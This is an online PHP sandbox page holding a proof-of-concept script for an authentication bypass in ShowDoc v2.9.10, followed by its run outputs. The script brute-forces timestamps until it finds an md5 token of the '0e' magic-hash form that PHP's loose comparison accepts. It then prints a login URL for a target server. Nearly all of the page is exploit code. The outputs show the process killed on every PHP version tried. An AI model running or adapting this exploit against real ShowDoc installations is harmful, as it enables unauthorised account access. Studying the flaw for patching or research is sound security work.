Online PHP editor | output for DBlsO

@ 2021-10-13T14:57:21Z

<?php
    //	Credit：Qianxin, Network Security Department, Product-Safety Team ( Unc1e )
    //  Date：2021/10/13
    /*
  	 	ShowDoc v2.9.10 Auth Bypass PoC #2:
  	    1) PHP Type Juggling (弱类型), see https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf
  	    2) Using that:
  	         ('0e111' == '0e222') => (bool)true
  	    3) This script use Brute-Forcing to find a possible collision
    */
    $username = 's' ; // Forged username
    $time = 1694131871 ; //2023-09-08 08:11:11, always valid timestamp
    $login_secret_key = '35d0b093f240cf6abedbe85fb174d317'; //a possible bin2hex( random_bytes( 16 ) );


    $total = 1000000;
    for ($i=0; $i<(1000*$total); $i++){// try to Find solution in 1 Billion numbers!
        $time += 1;
        $token = md5($username.$login_secret_key.$time);
        if (substr($token, 0, 2) === "0e"){
            if(preg_match('/^[0]+e[0-9]+$/', $token)) //0e123, 00e123, ...
            {
                echo "time:$time, while final is: $token".PHP_EOL;
            }
            
        }
        if (($i % $total) == 0){
            echo "[".($i/$total)."‰]".PHP_EOL;
        }
    }

    echo "http://[showdoc]/server/?s=/api/extLogin/bySecretKey&username={$username}&time={$time}&token={$token}&redirect=".PHP_EOL;// Please replace the [showdoc] to your target

?>

Output for 7.3.23, 7.4.26, 8.1.1, 8.1.28, 8.2.16 - 8.2.18, 8.3.3 - 8.3.4, 8.3.6: [0‰] [1‰] [2‰] [3‰] [4‰] [5‰]
Process exited with code 137.
Output for 8.3.5: Warning: PHP Startup: Unable to load dynamic library 'sodium.so' (tried: /usr/lib/php/8.3.5/modules/sodium.so (libsodium.so.23: cannot open shared object file: No such file or directory), /usr/lib/php/8.3.5/modules/sodium.so.so (/usr/lib/php/8.3.5/modules/sodium.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0 [0‰] [1‰] [2‰] [3‰] [4‰] [5‰]
Process exited with code 137.
Output for 8.1.26, 8.2.14, 8.3.0 - 8.3.2: [0‰] [1‰] [2‰] [3‰] [4‰] [5‰] [6‰] [7‰] [8‰] [9‰]
Process exited with code 137.
Output for 8.1.25, 8.1.27, 8.2.13, 8.2.15: [0‰] [1‰] [2‰] [3‰] [4‰] [5‰] [6‰] [7‰] [8‰] [9‰] [10‰]
Process exited with code 137.
Output for 8.2.12: [0‰] [1‰] [2‰] [3‰] [4‰] [5‰] [6‰] [7‰] [8‰]
Process exited with code 137.
Output for 8.0.30, 8.1.23, 8.2.11: [0‰] [1‰] [2‰] [3‰] [4‰] [5‰] [6‰] [7‰]
Process exited with code 137.
Output for 7.3.0 - 7.3.22, 7.3.24 - 7.3.33, 7.4.0 - 7.4.25, 7.4.27 - 7.4.33, 8.0.0 - 8.0.29, 8.1.0, 8.1.2 - 8.1.22, 8.1.24, 8.2.0 - 8.2.10: [0‰] [1‰] [2‰] [3‰] [4‰] [5‰] [6‰]
Process exited with code 137.

preferences:dark modelive preview